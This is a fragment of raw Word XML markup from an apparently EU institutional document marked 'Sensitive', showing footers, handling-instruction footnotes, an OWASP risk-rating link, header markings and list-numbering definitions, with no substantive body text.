      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t>58</w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="17C5A628" w14:textId="6DF5968E" w:rsidR="00DA165B" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="003C7E89">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-133839"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="-973829114"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="785701223"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="-1682970953"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentDate" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:date w:fullDate="2025-11-05T00:00:00Z">
          <w:dateFormat w:val="dd/MM/yyyy"/>
          <w:lid w:val="en-GB"/>
          <w:storeMappedDataAs w:val="dateTime"/>
          <w:calendar w:val="gregorian"/>
        </w:date>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>05/11/2025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CA56" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A2F91" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F7A552E" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53229582" w14:textId="77777777" w:rsidR="002011FB" w:rsidRPr="001019D3" w:rsidRDefault="002011FB"/>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="4FCEC896" w14:textId="47F730E7" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00B01C17" w:rsidP="000A3C26">
      <w:pPr>
        <w:pStyle w:val="FootnoteText"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:tab/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-956555743"/>
          <w:dataBinding w:xpath="/Texts/SensitiveHandling" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
          <w:text w:multiLine="1"/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="001019D3">
            <w:t xml:space="preserve">Distribution only on a need-to-know basis. Do not read or carry openly in public places. Must be encrypted in transmission and stored securely, where possible by using encrypted storage. Destroy copies by shredding or secure deletion. Full handling instructions: </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:hyperlink r:id="rId1" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://europa.eu/!db43PX</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w14:paraId="49BE5A00" w14:textId="7AD79B18" w:rsidR="00EF3370" w:rsidRDefault="00EF3370" w:rsidP="00B312DF">
      <w:pPr>
        <w:pStyle w:val="FootnoteText"/>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId2" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/OWASP_Risk_Rating_Methodology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6DC5" w14:textId="1A90974E" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
        <w:alias w:val="Header Markings - Sensitive Header"/>
        <w:tag w:val="JXl2wtaMia22AtzavBkz4E-H2kcTHn7146YpcBBcLYkI3"/>
        <w:id w:val="-1710259562"/>
        <w:temporary/>
        <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="MarkingLabel"/>
          </w:rPr>
          <w:t>Sensitive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660F" w14:textId="0DB3A6D8" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
        <w:alias w:val="Header Markings - Sensitive Header"/>
        <w:tag w:val="JXl2wtaMia22AtzavBkz4E-H2kcTHn7146YpcBBcLYkI3"/>
        <w:id w:val="-1596166659"/>
        <w:temporary/>
        <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="MarkingLabel"/>
          </w:rPr>
          <w:t>Sensitive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8D12" w14:textId="0DE269DD" w:rsidR="00C05FB8" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00C05FB8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
        <w:alias w:val="Header Markings - Sensitive Header"/>
        <w:tag w:val="JXl2wtaMia22AtzavBkz4E-H2kcTHn7146YpcBBcLYkI3"/>
        <w:id w:val="403582565"/>
        <w:temporary/>
        <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="00C05FB8" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="MarkingLabel"/>
          </w:rPr>
          <w:t>Sensitive</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BC03" w14:textId="77777777" w:rsidR="00382BC6" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
        <w:alias w:val="Header Markings - Sensitive Header"/>
        <w:tag w:val="JXl2wtaMia22AtzavBkz4E-H2kcTHn7146YpcBBcLYkI3"/>
        <w:id w:val="1728334365"/>
        <w:temporary/>
        <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="MarkingLabel"/>
          </w:rPr>
          <w:t>Sensitive</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A03C" w14:textId="77777777" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00382BC6">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
        <w:alias w:val="Header Markings - Sensitive Header"/>
        <w:tag w:val="JXl2wtaMia22AtzavBkz4E-H2kcTHn7146YpcBBcLYkI3"/>
        <w:id w:val="1810591351"/>
        <w:temporary/>
        <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rStyle w:val="MarkingLabel"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="MarkingLabel"/>
          </w:rPr>
          <w:t>Sensitive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D442AB6"/>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3D53118"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7F440A4"/>
    <w:name w:val="ListBulletNumbering"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="454"/>
        </w:tabs>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="907"/>
        </w:tabs>
        <w:ind w:left="907" w:hanging="453"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09EC4630"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA64B816"/>
    <w:lvl w:ilvl="0" w:tplc="79701B2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Sous-tche"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>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2900F7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0B948FC6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListDash4"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EFB7115"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="024EB6A2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="ListNumber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0B7201"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D86E464"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1084"/>
        </w:tabs>
        <w:ind w:left="1084" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1537"/>
        </w:tabs>
        <w:ind w:left="1537" w:hanging="453"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2444"/>
        </w:tabs>
        <w:ind w:left="244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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="120B8345"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94E8017A"/>
    <w:name w:val="TableListNumberNumbering"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="TableListNumber"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="454"/>
        </w:tabs>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="TableListNumberLevel2"/>
      <w:lvlText w:val="(%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="907"/>
        </w:tabs>
        <w:ind w:left="907" w:hanging="453"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="TableListNumberLevel3"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Table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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1262685D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="978A2CCC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListBullet4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="142E4B52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A522B902"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="143D0A16"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="733AE0FC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListBullet3"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="172F0AC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E76CAB04"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="ListNumber2"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="908"/>
        </w:tabs>
        <w:ind w:left="908" w:hanging="341"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="ListNumber2Level2"/>
      <w:lvlText w:val="(%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="453"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListNumber2Level3"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1815"/>
        </w:tabs>
        <w:ind w:left="1815" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListNumber2Level4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2268"/>
        </w:tabs>
        <w:ind w:left="2268" w:hanging="453"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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18203322"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BFC6026"/>
    <w:styleLink w:val="Style2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C7B624F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="55144760"/>
    <w:name w:val="ListDash 1222"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListDash2"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F0667F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D7A3630"/>
    <w:name w:val="EurolookHeading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446D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0BA633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07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C8D5AD3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4650FA8E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListBullet2"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D293CE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="721C25B4"/>
    <w:name w:val="LegalNumParNumbering"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="LegalNumPar"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="476"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="LegalNumPar2"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="952"/>
        </w:tabs>
        <w:ind w:left="952" w:hanging="476"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pStyle w:val="LegalNumPar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17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D293CF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD40F45A"/>
    <w:name w:val="ContNumNumbering"/>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18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37CB1E1C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="628C12D0"/>
    <w:name w:val="List Dash 1223"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="Style1"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A7730C4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9146BC48"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="ListBullet1"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="419A7FA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EF2AEB2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="ListNumber"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="454"/>
        </w:tabs>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListNumberLevel2"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="814" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListNumberLevel3"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1267" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
